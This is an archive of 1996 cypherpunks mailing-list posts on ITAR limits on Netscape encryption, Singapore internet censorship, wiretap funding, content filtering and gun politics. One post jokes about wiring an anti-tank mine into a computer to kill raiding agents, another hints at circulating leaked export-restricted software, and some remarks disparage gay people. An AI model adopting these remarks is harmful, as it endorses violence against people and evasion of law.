Having a copy of the driver is enough to arouse suspicion.  If they 
don't find anything useful in that one partition, they'll assume 
the second is in use and that you're not giving up the key.  You may 
very well get accused of maintaining a second system even if you are 
not and do not have anything incriminating in the one encrypted fs.

---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sat, 20 Jul 1996 22:25:14 +0800
To: David Sternlight <david@sternlight.com>
Subject: Re: ABC News on internet telephony
Message-ID: <199607191718.NAA04083@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


ISPs have functioned better using flat monthly rates, and the biggies are like
AT&T are going in the same direction for internet access.  I don't 
see this as being 'counter-intuitive' at all.  The costs to the 
ISPs and telcos aren't really based on where you call or how long you 
are on anymore.

Big questions are how the main hubs for the internet are maintained 
(esp. when some of the big telcos maintain them... a conflict of 
interest, perhaps).  Will fees become too much that smaller ISPs are
put out of business, or that we'll start seeing ISPs merge?  (Remember
when there were mainly local cable companies?)

On 18 Jul 96 at 11:03, David Sternlight wrote:

[..]
> This is the rankest speculation on my part, but could some of the bigger,
> smarter phone company cum internet providers have done some serious
> analysis and concluded that we're moving away from distance-based rates for
> voice calls. Might they even have examined where we'll be in the next ten
> years (with ADSL, etc.) and decided that the network technology and simple
> market economics makes fixed charges per "line" more profitable to them
> than metered usage? Maybe this is wishful thinking on my part, but some of
> the bigger actors are starting to behave in a surprisingly
> counter-intuitive (based on the way we stereotype them) fashion on this
> topic.
 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sat, 20 Jul 1996 01:18:03 +0800
To: cypherpunks@toad.com
Subject: BIG_dif
Message-ID: <199607191259.MAA23555@pipe6.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   7-19-96. NYP: 
 
   "AT&T and Wells Fargo Investing in an Electronic Cash 
   Card." 
 
      The companies said that they would form the American 
      affiliate of Mondex. Any one with a Mondex card can 
      transfer electronic cash to anyone else with a card. 
      This flexibility has raised concerns both about the 
      possibility of counterfeiting and of money laundering. 
      Because of these concerns, Mondex has been modified in 
      the United States so that banks will be able to track 
      card use. That will allow them to audit for fraud, if 
      not recreate every transaction. Data from Mondex cards 
      will be used for various product marketing. 
 
      "We believe there should be privacy, but there is a big 
      difference between privacy and anonymity," Dudley Nigg, 
      executive vice president of Wells Fargo, said. 
 
   ----- 
 
   http://pwp.usa.pipeline.com/~jya/bigdif.txt  (4 kb) 
 
   BIG_dif 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Sat, 20 Jul 1996 23:40:57 +0800
To: cypherpunks@toad.com
Subject: Singapore officials censor U.S. newgroup posting
Message-ID: <v01510102ae157d86819b@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain


This move by Singapore to censor a newsgroup posting is a good example of
the overbreadth of government censorship. It's a bait-and-switch maneuver:
say you're going after porn but censor "offensive" speech.

Of course, this gives the lie to the Singapore government's assertion
that "we are not censoring discussion groups."

Some excerpts from the recent regulations requiring the registration of
political or social groups: "Political and religious organisations are free to
conduct discussions provided they guard against breaking the law or
disrupting social harmony.

The regulations ban contents that "tend to bring the Government into hatred
or contempt," are "pornographic," or "depict or propagate sexual
perversions such as homosexuality, lesbianism, and paedophilia."

I have more information on the regulations at:
  http://www.eff.org/pub/Global/Singapore/
  http://www.cs.cmu.edu/~declan/international/

-Declan

---

Singapore Internet Regulators Take First Action, Censor Posting

July 19, 1996
AP-Dow Jones News Service

SINGAPORE -- In its first action since assuming powers this week to
police the Internet, the Singapore Broadcasting Authority has yanked
off a newsgroup's posting that criticized some lawyers, a newspaper
reported Friday.

The SBA acted on a complaint by an unidentified law firm, which said
the contents of the anonymous posting defamed some of its lawyers in
Singapore, according to a report in the Straits Times newspaper Friday.

The newspaper said the posting on the newsgroup was apparently made by
a disgruntled client who claimed he lost a case even though his lawyers
told him he could win it. The client also questioned the ability of the
lawyers who belongs to one of the oldest firms in Singapore, the
Straits Times said.

Under new SBA regulations that came into effect Monday, the government
agency has the power to ask Internet service providers to remove
material that it considers objectionable. A government-appointed panel
of prominent citizens decides what is objectionable.

The Straits Times said the posting is believed to have been made from
the U.S., which means the SBA, in keeping with its own rules, will not
be able to take action against the offender.

The SBA says its rules are mainly directed against pornography,
anti-government or seditious views, racially motivated slurs and
articles that could inflame religious passions.

Since Monday, Internet providers, political parties that maintain Web
sites, groups and individuals who run discussion sites on politics and
religion, and on-line newspapers are deemed to have become
automatically licensed. This means refusal to follow the SBA rules will
result in fines. The amounts are yet to be determined.

[...]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Sat, 20 Jul 1996 20:07:22 +0800
To: Cerridwyn Llewyellyn <paquin@netscape.com
Subject: Re: Netscape download requirements
In-Reply-To: <2.2.32.19960719084701.006a8aac@gonzo.wolfenet.com>
Message-ID: <v0300760eae159927b241@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:47 AM -0700 7/19/96, Cerridwyn Llewyellyn wrote:

>Allow the government to think that we think it has the right to give
>us their permission and we've lost everything.  The government should
>need OUR permission, not the other way 'round.

That's what happened, or didn't you notice that ITAR is based on laws
passed by an elected Congress? Didn't you notice that thus far when people
with one position on the matter have tried to persuade Congress to modify
ITAR, they have failed? This is a (as far as it goes) a democracy, not a
'Llewyellyn and those who agree with him' dictatorship.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Sat, 20 Jul 1996 20:45:32 +0800
To: junger@pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger)
Subject: Re: MSNBC and cookies
In-Reply-To: <199607191300.JAA00488@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <199607191710.NAA17552@nrk.com>
MIME-Version: 1.0
Content-Type: text


> 
> It's a nuisance, but I suppose there is no reason that a commercial
> service can't do such a thing.  But what happens when one tries to
> access it with Lynx?
> --
> Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH

Err...

W/ Lynx it's a dead-end. You get nowhere.


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Sat, 20 Jul 1996 19:51:28 +0800
To: cypherpunks@toad.com
Subject: Re: Gorelick testifies before Senate, unveils new executive order
In-Reply-To: <v02120d08ae159250ae12@[192.0.2.1]>
Message-ID: <v03007610ae159cf39642@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:44 PM -0700 7/19/96, Lucky Green wrote:
>At 3:04 7/18/96, David Sternlight wrote:
>
>>Serious studies have shown that the kinds of protections to make the
>>systems we depend on robust against determined and malicious attackers (say
>>a terrorist government, or one bent on doing a lot of damage in retaliation
>>for one of our policies they don't like), have costs beyond the capability
>>of individual private sector actors. Your friendly neighborhood ISP, for
>>instance, probably can't affort the iron belt and steel suspenders needed
>>to make his system and its connectivity sabotage-proof, and so on. Even
>>cheap but clever solutions involving encryption in such systems require
>>standards and common practices across many institutions.
>
>However, the neighorhood IPS doesn't need the kind of defenses required for
>the powergrid and other crucial systems. The systems that do require such
>heightend security are typically run by parties that can afford such
>security. If they choose not to implement them, then it stands to reason
>that their threat evaluation does not deem it necessary. Let market forces
>govern, lest we spend money on countermeasures for inflated threats.

I suggest that your comment about non-neighborhood IPS systems is
speculative and isn't based on reading the formal threat assessment
analysis.

You are entitled to your opinion but it's just that, not an analytic
argument. It also contains at least one false assumption: that if "their"
threat evaluation deems it important, they can afford to implement it. As
we know this is flat out false. Many aviation experts have said that we
could make airplanes a lot safer than they are now (for example), but
nobody could afford to fly them if we did.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Sat, 20 Jul 1996 18:58:41 +0800
To: jti@i-manila.com.ph>
Subject: Re: Reverse Engineer
In-Reply-To: <199607191411.KAA06664@piglet.pooh-corner.com>
Message-ID: <v03007611ae159e08d763@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:05 AM -0700 7/19/96, elfgard@pooh-corner.com wrote:
>> What do you mean by "reverse engineer?" I have heard this word several
>>times especially in the world of hacking, but... can someone tell me what
>>it really meant?
>
>Interesting question.
>Hmmm...
>
>I would answer this question for you but then I would have to kill
>you.
>
>That is basically like asking a car thief to tell yuo about how he
>breaks into cars and what cars hes broken into lately.
>
>My suggestion to you is to pick up one of those MEGA lame books like
>"What is a Cyberpunk!" and read that.  It may not tell you shit, but
>it will give you a broad understanding about what you want to know.

This is such a smug, superior, put-off that I have to give the original
questioner his answer. Reverse engineering means taking a product and from
inspection and analysis, figuring out a way to duplicate it. Engineering is
starting out with specs and coming out with the product. Reverse
engineering is starting out with the product, coming up with specs and then
duplicating the product.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bert-Jaap Koops" <E.J.Koops@kub.nl>
Date: Sat, 20 Jul 1996 01:04:05 +0800
To: cypherpunks@toad.com
Subject: Re: Filtering out Queers is OK
Message-ID: <13CD51B9655D@frw3.kub.nl>
MIME-Version: 1.0
Content-Type: text/plain


I'd rather say, filtering out TCM is OK.

Bert-Jaap




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <root@edmweb.com>
Date: Sat, 20 Jul 1996 19:05:25 +0800
To: Jeff Weinstein <jsw@netscape.com>
Subject: Re: Netscape 3.0B US version MD5 (was: Re: overseas PGPfone and Netscape)
Message-ID: <Pine.BSF.3.91.960719134853.195C-100000@bitbucket.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


>> Anyone sniffing the link
>> knows the filename from previous forms submissions, anyway.

>  You can't sniff the link, since the form submission and the
>file download are via SSL.

How ironic. :>

Remember why people are downloading the software in the first place. They
only have eight-cent exportable 40-bit SSL. 

<sarcasm>
I'm sure the evil Iraqi terrorists (and other horsemen) are snooping the
line, using their newly purchased PCs and FPGAs to crack the 40-bit crypto
so that they can gain the wonderful advantages of 128-bit SSL, which will
of course prevent wiretaps from working, thus aiding them in their
terrorist attacks and bringing about the end of the world as we know it. 
</sarcasm>


=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)    |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/ |
| PGP (2048/9F317269) Fingerprint: 11C89D1CD67287E68C09EC52443F8830 |
|          -- Disclaimer: JMHO, YMMV, TANSTAAFL, IANAL. --          |
===================================================================:)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Fri, 19 Jul 1996 23:50:11 +0800
To: cypherpunks@toad.com
Subject: Re: US versions of Netscape now available
Message-ID: <199607191213.OAA03214@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199607190709.IAA00119@server.test.net> you wrote:

: Jeff Weinstein <jsw@netscape.com> writes:
: > Adam Back wrote:
: > > Presumably as this latest netscape beta is freely distributable, once
: > > it's out it will be on ftp.unimi.dsi.it, ftp.ox.ac.uk, etc, etc.
: > 
: >   Just a minor nit.  No netscape software is freely distributable.
: > The license agreement does not allow people who download it
: > to redistribute it.

: Oh dear!  So I am incorrect... but wait, what about people like
: sunsite northern europe (Imperial College London: ftp.doc.ic.ac.uk)
: who already have a license to be a Netscape mirror site.  Would this
: license allow them to distribute this latest 128 bit netscape beta
: (were it to leak)?

I would like to know what Netscape's position on the above mentioned
scenario is .. (Uploading "possibly" received 128 bit binaries to
official netscape mirrors outside the US, that is) (guess why ...)

bEST Regards,
--

	-AJ-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 20 Jul 1996 09:15:45 +0800
To: cypherpunks@toad.com
Subject: Kellstrom Calls for DT Funding
Message-ID: <2.2.32.19960719183314.00847ac0@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


In a "briefing" on TWA 800 when one of the reporters tossed Big Jim
Kellstrom (Deputy Director in Charge of the New York Office) of the FBI a
softball question about what he needed to fight terrorism; he took the
opportunity to call for full funding of the Digital Telephony Bill.  He said
the usual about how bad guys conspire and we need to tap.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@xenon.chromatic.com>
Date: Sat, 20 Jul 1996 14:39:11 +0800
To: Jonathon Blake <grafolog@netcom.com>
Subject: Giving 6 year old kids Uzi's (Was: Responding to Pre-dawn Unannounced Ninja Raids)
In-Reply-To: <Pine.SUN.3.95.960719073844.6676D-100000@netcom13>
Message-ID: <199607192139.OAA23712@server1.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



> > the price of freedom of mind is a minor restriction on your personal
> > freedom, you won't be allowed a weapon either but that is the tradeoff. 
> 
> Thanks, but if it is all the same to you, I'd rather live
> in a country where everybody  << including six year olds >>
> carry, and can use Uzi's, etc, as a matter of course.

Oh my ... you aren't serious, are you?

I suspect you might be baiting ... but ...

If you can trust a six-year-old with an Uzi, I assume that you believe
the six-year-old can "properly" judge what is a threat and what isn't?
Just why do you suppose a pissed-off six-year-old (because, let's say,
another six-year-old stole his lunch) would not blast someone?

Would you just hand out guns to all teenagers?

You might have had a different childhood, but when I (and most of my
friends) were 6 (or 12 or even 18), our primary concern was having fun,
avoiding stuff we don't like (like homework), attracting females (or
males, as the case may be), attracting attention in general, avoiding
being one-upped (in conversation or in sports or otherwise) but always
on-upping someone else, ...

Oh ... and ice cream ... but that was mostly me ... most of my friends
wanted candy.

No where in this list of high priority items is respect for human life,
peace and brotherhood among mankind, end world hunger, etc ...  There
are very good historical reasons why 18 and 21 are reasonable (though
sometimes conservative) guesses at the age of maturity, responsibility
and consent.

If you are not killing someone else because they (may) have an Uzi, I
think, sooner or later, you will figure out a way to kill him before
he can pull it out.

This means that a group of 1000 KKK members will kill a group of 10
blacks due to overwhelming force.  One principle in the Constitution
(which I personally respect very much) is that a majority should not
force its views on a minority.

Incidentally, if you are interested, I DO have a child (almost 2 yrs),
and I certainly would not even contemplate letting him have a gun (no
matter how well he can use it) until he can legal get one himself.  I
will certainly invoke serious wrath (on him and anyone else involved)
if I ever found him with a gun.

By the way, would you let a 6 year old drive?  or fly?  (Assuming that
they are physical capable and trained to do such.)

Ern






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 20 Jul 1996 13:55:47 +0800
To: "Peter D. Junger" <cypherpunks@toad.com>
Subject: Re: "address verification databases"? (was: Netscape download...)
Message-ID: <v02120d09ae159d3a3e24@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 17:53 7/18/96, Peter D. Junger wrote:
>With much help from Tom Weinstein and a bit of luck, I have succeeded
>in downloading the Linux version.  But the time I tried before it
>finally worked, I typed in the New York City area code (212) rather
>than the Cleveland area code (216) and since I had given them a
>Cleveland address and ZIP code, they (the server, that is) said that I
>had made an error.  So that must be one thing that they check.

Despite the ITAR, Netscape's US version is already available from the usual
free-world FTP sites. Next time, you might want to get your copy there.
BTW, can somebody please tell me why PGP generated *.asc files show up in
Netscape as "VRML Worlds"?

TIA,


-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bruce M." <bkmarsh@feist.com>
Date: Sat, 20 Jul 1996 21:09:05 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: The risks of information warfare
In-Reply-To: <AE152A80-FD945B@193.239.225.200>
Message-ID: <Pine.BSI.3.91.960719145513.8078A-100000@wichita.fn.net>
MIME-Version: 1.0
Content-Type: text/plain


On 19 Jul 1996, Clay Olbon II wrote:

> 	2.  Second hand smoke kills.  Probably, but the only statistical link was
> found by picking and choosing which studies to use.  And the freedoms of
> millions of Americans are dramatically restricted based on this premise.

   That and the fact that it can be physically sickening to the people 
who have to be around such individuals.

> 	3.  Terrorism is a big threat to the "national security".  Of course more
> people are killed in the bathtub than by terrorists, but that is beside the
> point.

    The government can't do much about accidental bathtub deaths though.  
Terrorism can be dealt with on a much more tangible level.

> My reason for bringing these up is that I think much of the "information
> warfare" 5th horseman is overblown hype - in the same category as 1-3
> above.  Of course, many security professionals will disagree, because it is
> in their best interests to do so - their level of funding depends on it.  

    I look at it this way.  Information warfare has the *potential* of 
being as potentially destructive as conventional warfare due to the very 
nature of our country's infrastructure.  However, when we look at other 
means of war that were supposed to be the "ultimate" force, like nuclear 
weapons, we've historically seen that they work better as pawns in the 
power struggle rather than as actual playing pieces.

    The main difference between nukes and infowar is that an attack by 
the latter means is more feasible for just about anyone as opposed to an 
actual country or powerful organization having nukes.

> Sure, there have been break-ins and some loss of $$ (of course that is what
> insurance companies are for).  I have seen nothing, to date, that would
> justify massive increases in government power over the private sector; 

    Neither have I.  It would seem that the government has worked more 
towards actively discouraging any good infosec policies than helping 
out.  Let them take care of foreign nations amassing large groups of 
Internet connected work stations in their military bases and I think we 
can handle the infrequent malicious individual.

                       ________________________________
                      [ Bruce M. - Feist Systems, Inc. ]
                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
     "Official estimates show that more than 120 countries have or are 
      developing [information warfare] capabilities." -GAO/AIMD-96-84
                         So, what is your excuse now?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Sat, 20 Jul 1996 13:16:55 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: PictureTel Licenses Cylink Security Technology For EncryptedVideoconfe (fwd)
In-Reply-To: <199607191526.LAA17075@nrk.com>
Message-ID: <v03007612ae15b6edb039@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:26 AM -0700 7/19/96, David Lesher wrote:
>Message-ID: <BcylinkURQwQ_6lJ@clari.net>
>
>Clarinet reports:
>
>   SUNNYVALE, Calif.--(BUSINESS WIRE)--July 19, 1996--Cylink Corp.
>(NASDAQ: CYLK) today announced that it has licensed its patented
>security technology, the Diffie-Hellman, Hellman-Merkle patents
>covering public key cryptography, to PictureTel Corp. (NASDAQ:PCTL)
>to be used in its System 4000 group videoconferencing systems.
>
>   The Cylink license allows access to all implementations of
>Public Key cryptography, including Diffie-Hellman key exchanges and
>Digital Signature Standard (DSS), .....

That's what Cylink claims. RSADSI disagrees vigorously. Stay tuned for the
court results.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Sat, 20 Jul 1996 22:42:20 +0800
To: Troy Denkinger <cypherpunks@toad.com
Subject: Re: Filtering out Queers is OK
In-Reply-To: <2.2.32.19960719154550.0073d960@popd.ix.netcom.com>
Message-ID: <v03007613ae15b757c962@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:45 AM -0700 7/19/96, Troy Denkinger wrote:

>However, most people who use these filters are going to be quite happy to
>allow some corporate entity the privilege of setting their filters for them
>and, if the consumer should ask about criteria and such, they are told that
>that's a trade secret.  So, people will be allowing a corporate entity that
>exists for profit to set their filters for them.  This is a very scary thing
>and perhaps even more frightening than having the government do it.

Not so fast, D'Artagnan. Let's deconstruct your statement that it's a scary
thing:

1. Is it scary to the people who buy and use it? Apparently not, since they
hae free choice.

2. Is your finding it scary relevant? Apparently not, since you don't have
to buy it and thus have free choice.

What's left except authoritarianism on your part?

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@xenon.chromatic.com>
Date: Sat, 20 Jul 1996 19:54:13 +0800
To: Troy Denkinger <troy_d@ix.netcom.com>
Subject: Re: Filtering out Queers is OK
In-Reply-To: <2.2.32.19960719154550.0073d960@popd.ix.netcom.com>
Message-ID: <199607192209.PAA24069@server1.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



> > I see nothing wrong in this. Anyone who disagrees is, of course, free to
> > set his filters differently, but not to insist that my filters be changed.
> > And the government is not free to pass any laws about what filter sites can
> > and can't do.
> 
> that's a trade secret.  So, people will be allowing a corporate entity that
> exists for profit to set their filters for them.  This is a very scary thing
> and perhaps even more frightening than having the government do it.  I think

If I'm not mistaken, the point here is that you can always choose NOT
to go with filter XYZ, and instead, purchase services with filter ABC.
It is still not perfect, but then, that is the point.  We do not trust
any SINGLE entity.  However, if I have a choice of entities, then I am
willing to try one, and let them abuse me in the short term.  Simple
free market principle says that a filter will show up with me needs
sooner or later.

If the filter is the government, I have no direct choice.  I have very
very indirect choices, but I cannot just shut off the service if I don't
like it.

Ern






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@xenon.chromatic.com>
Date: Sat, 20 Jul 1996 19:30:33 +0800
To: ceridwyn@wolfenet.com
Subject: No Subject
Message-ID: <199607192221.PAA24259@server1.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



> >If I had kids, I'd make sure that lots of negative memes were kept away
> >from them until they reached an age where it no longer mattered, where
> >there views are already basically set.
> 
> I am sorry to hear.  I think we underestimate childrens' ability to decide
> for themselves what is right and wrong, and I think the seemingly inate 
> desire for parents to want children that are all but clones of themselves
> is especially dangerous and certainly harmful. I think that restricting access
> to "negative memes" from anyone (including children) actually does more
> harm than good.  I didn't particularly want to get into this, so I will

(Don't make the point if you don't want to discuss it.)

I have a child, and if you don't, you really should try to raise a child
for a week.  What a child considers "right" or "wrong" is very much
dependent upon about a million different factors, very few of which, you
have any serious notion, let alone control.

In addition, a child, in parallel, learns behavior at the same time it
is judging what to absorb; therefore, you can't just "turn on" learning
mode and "turn off" judging, "download values", "turn off" learning and
"turn on" judging.

Most things children pick up are not really that "damaging".  However,
certain things in life are strictly designed to damage.  Anything from
a verbal "fuck you" to an Uzi.  Therefore, restrictions on access to
those sorts of things are not that unreasonable, until the child has
learned enough to understand the consequences of their actions, and can
functionally and socially adapt to their choice of environments.

Ern






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 20 Jul 1996 14:20:09 +0800
To: David Sternlight <david@sternlight.com>
Subject: Re: Netscape download requirements
In-Reply-To: <v0300760eae159927b241@[192.187.162.15]>
Message-ID: <Pine.SUN.3.91.960719151907.12130C-100000@crl4.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Fri, 19 Jul 1996, David Sternlight wrote:

> At 1:47 AM -0700 7/19/96, Cerridwyn Llewyellyn wrote:
> 
> >Allow the government to think that we think it has the right to give
> >us their permission and we've lost everything.  The government should
> >need OUR permission, not the other way 'round.
> 
> ...This is a (as far as it goes) a democracy, not a 'Llewyellyn
> and those who agree with him' dictatorship. 

Actually, for what it's worth, this (meaning the US) is a 
Constitutionally limited democratic republic, NOT a dictatorship
of the majority, the proletariate, etc.  That has been tried and
failed too many times to mention.  Read the Ninth and Tenth
Amendments to the Constitution for further enlightenment.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Paquin <paquin@netscape.com>
Date: Sat, 20 Jul 1996 13:21:51 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape download requirements
In-Reply-To: <31EFCCCC.B13@netscape.com>
Message-ID: <31F00BD6.3DEA@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


sameer wrote:

>         What's the big deal here? 

Obviously, I'm tired and should have shut up long ago.

BTW the "pick.cgi" renaming stuff should be fixed now.
Thanks for the prods.

--
Tom Paquin            Netscape Communications Corp
about:paquin




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Senescall <apache@quux.apana.org.au>
Date: Fri, 19 Jul 1996 15:51:20 +0800
To: cypherpunks@toad.com
Subject: ********Apology**********
Message-ID: <Pine.LNX.3.91.960719152701.20176A-100000@quux.apana.org.au>
MIME-Version: 1.0
Content-Type: text/plain



To the dozens of people subject to a careless error on my part and who 
would have received bounced mail from me I apologise.

I have fixed the error.

Sorry.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Sat, 20 Jul 1996 03:59:09 +0800
To: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Subject: Re: Filtering out Queers is OK
In-Reply-To: <2.2.32.19960719095559.00692920@gonzo.wolfenet.com>
Message-ID: <Pine.BSF.3.91.960719152653.13089A-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




> >Filtering is not "wrong," Cerridwyn, it is a rational response to garbage
> >being spewed constantly. I filter lots of items. I read "Scientific
> >American" and "The Economist" because they filter (or "censor," in the
> >sense some are objecting to here) nonsense about "queer rights" and
> >"peircing fashions," to name but a few things I have no interest in hearing
> >about.
> 

...  hmmm ...

You seem to be fighting a losing battle; the Wall Street Journal carried 
an article about piercing AND an article about using Kool Aid as hair dye 
this week. Who knows - the Economist may not be far behind (although the 
mag has gotten so thin, there wouldn't seem to be much room).

- r.w.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@xenon.chromatic.com>
Date: Sat, 20 Jul 1996 15:17:12 +0800
To: harka@nycmetro.com
Subject: Re: Responding to Pre-daw
Message-ID: <199607192233.PAA24315@server1.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



> > If you want to own guns then you should accept the fact that you risk
> > having your head blown off in the middle of the night by a SWAT team.
> > Just as the car has introduced the risk of being killed in a trafic
> > accident the gun has introduced new risks. If society dosen't like the
> > risks then it can opt to ban the technology. 
> 
> Except that getting killed in a traffic accident IS an accident (mostly :)
> while having black clad Fed's storming into your house was _consciously_
> decided by them, because THEY have a problem with YOUR guns (?!)...

I think the original point was that they MIGHT storm into your house by
mistake (say, because they incorrectly accepted a informant's story).
Therefore, it is truly a mistake.

That said, it is still not justifiable for a SWAT team to FORCE a situation
where they may necessarily be in physical danger, and therefore, are forced
to respond with overwhelming force when the target may reasonably be
innocent.

Worse yet, the bureaucrats, whose asses are on the line when a tragic mistake
occurs, will rarely, if ever, admit to any wrongdoing.  They may be forced
out, at worse; there may be a symbolic verbal lynching in front of the
Congress, but that would be about it.

If such a tragedy were to occur to me, and I were to survive, I would want
the responsible PERSONS fully acknowledge their mistakes (and be properly
punished).  It is a travesty of justice to blame a no-name, faceless
"system" as was done in the well-known recent cases (whether or not the
target was ultimately found guilty of any misdeeds).

Ern






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 20 Jul 1996 14:20:01 +0800
To: ichudov@algebra.com (Igor Chudov)
Subject: [noise] Re: Responding to Pre-dawn Unannounced Ninja Raids
Message-ID: <2.2.32.19960719223454.00aedf1c@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:49 PM 7/19/96 -0500, you wrote:

>ObCrypto: how about putting an [anti-tank] mine inside your computer.
>When ninjas try to get to your files, the computer and [depending on
>your bloodthirstiness and load of explosives] ninjas will get
>destructed. Has anyone ever done that?

Sounds like an interesting way to secure a remailer.  (Especially against
Scientology raids.  "This remailer will self-destruct in five seconds." *BOOM*)

There was a case locally where some idiot booby-trapped his cache of weapons
and explosives.  Seemed a wee bit self-defeating.  (Blew all of his
explosives all over the place when it finally went off.  No one was hurt,
but it spread grenades and other choice bits all over the place.)  The local
kids got alot of souveneers out of that one...

<PSA>For more information on these and other ultimate chaotic acts, check
out _Agent of Chaos_ by Norman Spinrad.  This and other books of an
anarchist nature are available from your local library.</PSA>


---
|"Computers are Voodoo -- You just have to know where to stick the pins."|
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 20 Jul 1996 19:03:22 +0800
To: cypherpunks@toad.com
Subject: Re: Inventor of radio...
In-Reply-To: <199607191414.JAA25284@einstein.ssz.com>
Message-ID: <PowBRD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Jim Choate <ravage@einstein.ssz.com> writes:

> 
> Hi all,
> 
> I would like to correct a misconception about who is credited with the
> invention of radio. Nikola Tesla has held the credit for the creation since
> the resolution of the original lawsuit in the mid-80's.
> 
